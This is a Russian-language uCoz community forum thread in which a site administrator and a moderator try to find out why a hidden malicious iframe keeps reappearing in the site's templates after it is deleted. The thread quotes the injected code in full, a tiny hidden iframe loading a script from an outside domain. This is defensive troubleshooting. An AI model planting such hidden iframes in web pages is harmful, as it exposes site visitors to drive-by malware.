| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Репетитор, вы должны дать ссылку на свой сайт. у вас другой тип блокировки
|
|
webanet, Здравствуйте!
Я администратор сайта http://chelseablues.ru . Как писал SAREX, у нас на сайте появился вирус. И я нашел 2 iframe кода в верхней части шаблона и на форуме, хорошо спрятаных, которые я первый раз вижу и не ставил их на сайт. Так как такое может быть если я не ставил ничего то кто тогда? Только юкоз знает пароли. Вчера удолил этот код, а сегодня он опять появился. Этот код вел на какой-то фдео сайт, ну скорее всего пор..о. Что мне делать? Как это убрать? |
|
Veatone1105, сейчас вы видите свои ифреймы?
дайте кусок кода где они есть вместе с ними конечно же |
|
webanet, я даже не задумываясь удолил их. При удолениии этих кодов антивирусы не ругаются. Было проверино на пользователях. Вчера и сегодня.
Добавлено (25-Янв-2011, 23:09:32) |
|
Veatone1105,
Quote Вчера удолил этот код, а сегодня он опять появился. Этот код вел на какой-то фдео сайт, ну скорее всего пор..о. Что мне делать? Как это убрать? |
|
Quote (webanet) вы его уже убрали? Да. Я его еще вчера убирал, а он еще раз сегодня появился. И сегодня тоже чистил. Но просто хочется узнать из-за чего это? Так кидать вам сайт который был в iframe коде? Сообщение отредактировал Veatone1105 - Вторник, 25 Янв 2011, 23:13:06
|
|
Veatone1105,
Quote Так кидать вам сайт который был в iframe коде? а так у вас очень много мусора на сайте. вот сейчас скажу, что скрипт от ромале вместе с их кнопками перевода нужно удалить, вы же будете возмущаться вот это www.popularsite.ru/0pixel.php?mode=microbutton&publisherid=10000 топы, тонна скриптов с подгрузкой. хинт с подгрузкой Quote <script type="text/javascript" src="http://apocalypse.ucoz.kz/bigbar/hintblack.js"></script> в общем если ваши ифреймы появятся снова то копируйте их сюда. вместе с участком кода вокруг |
|
Доброго времени суток!
У меня проблемка на сайте. Появился вирус который "прячется" в "статистике сайта". При заходе на сайт или обновляя страницы, баннер статистики не отображается, антивирус блочит атаку. Что можно сделать?? PS: скрин Сообщение отредактировал Drenthe - Вторник, 25 Янв 2011, 23:26:47
|
|
Quote (webanet) обязательно и сам ифрейм если словите а так у вас очень много мусора на сайте. вот сейчас скажу, что скрипт от ромале вместе с их кнопками перевода нужно удалить, вы же будете возмущаться вот это www.popularsite.ru/0pixel.php?mode=microbutton&publisherid=10000 топы, тонна скриптов с подгрузкой. в общем если ваши ифреймы появятся снова то копируйте их сюда. вместе с участком кода вокруг Нет, не буду возмущаться, я принимаю критику. А сайт я скину все равно вам который был в том ифрэйме что бы все видели http:// imdbvideo.ru / il /stat . php |
|
Drenthe, у вас блочится стандартный домен юкоза. нужно обновить антивирус //forum.ucoz.ru/forum/45-36045-1
|
|
Veatone1105, посмотрите на это сообщение
//forum.ucoz.ru/forum/45-34556-681349-16-1295778605 выделенное красным. это то про что вы говорили? |
|
webanet, у меня антивирус сам обновляется, стоит последняя версия.
Я пока что добавил домен в исключение. Завтра уберу, посмотрю изменится что-то или нет. Спс. |
|
Quote (webanet) Veatone1105, посмотрите на это сообщение //forum.ucoz.ru/forum/45-34556-681349-16-1295778605 выделенное красным. это то про что вы говорили? Дааа вот это <iframe src="http://imdbvideo.ru/il/stat.php" width="3" height="2" style="visibility: hidden;"></iframe> если не ошибаюсь. А как оно появилось у меня на сайте? Сообщение отредактировал Veatone1105 - Среда, 26 Янв 2011, 00:16:35
|
|
Veatone1105, а теперь объясните внятно. появилось, вы очистились и ифрейм появился снова? вы ничего не делали, зашли на сайт, а там ифрейм? подробно
или вы правили код и после этого словили ифрейм |
|
webanet, вчера мне написал пользователь, что у него антивирус показывает чот есть вирус на сайте. Я сразу стал искать. Нашел iframe код, тот самый что вы мне показали в "Верхняя часть сайта" и в "Общий вид страниц форума" и сразу же удолил его. Спросил у того пользователя он сказал меперь все нормально. Сегодня захожу на сайт и мне опять говорят так и так, есть вирус 23 пользователя переустановили виндовс. Я опять искать и нашел опять такой же код, и там же, хотя я его удолил еще вчера. Но ничего я в тот день не ставил и позавчера тоже. Вот и вопрос откуда? Как он сам может появляться и сохраняться при этом?
|
| |||
Будьте в курсе всех обновлений: подпишитесь на наш официальный Telegram-канал uCoz и задавайте вопросы в чате сообщества!

Чат сообщества